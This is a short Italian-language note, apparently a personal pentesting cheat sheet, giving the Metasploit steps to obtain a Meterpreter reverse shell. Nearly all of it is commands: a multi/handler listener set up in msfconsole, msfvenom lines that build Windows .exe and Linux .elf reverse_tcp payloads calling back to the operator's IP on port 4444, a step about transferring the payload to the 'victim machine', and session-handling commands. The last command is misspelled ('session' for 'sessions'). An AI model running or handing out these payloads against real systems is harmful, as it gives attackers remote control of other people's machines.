tags: reverse_shell metasploit Metasploit_Meterpreter meterpreter


Per ottenere una reverse shell meterpreter possiamo eseguire i seguenti passaggi:

Per prima cosa ci mettiamo in ascolto tramite un listener:

 
msfconsole
 
use /exploit/multi/handler
 
set payload windows/meterpreter/reverse_tcp
 
set LHOST tuo_ip
 
set LPORT 4444
 
exploit
 

Ora che abbiamo generato il listener possiamo generare il payload:

Windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST=tuo_ip LPORT=4444 -f exe -o payload.exe

Linux

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<TUO_IP> LPORT=<TUA_PORTA> -f elf -o reverse_shell.elf

Dopo aver trasferito questo payload sulla macchina vittima ed eseguito otterremo una reverse shell meterpreter.

Nel caso la connessione non si attivi automaticamente possiamo utlizzare i seguenti comandi per aprirla:

sessions -l
 
session -i <numero>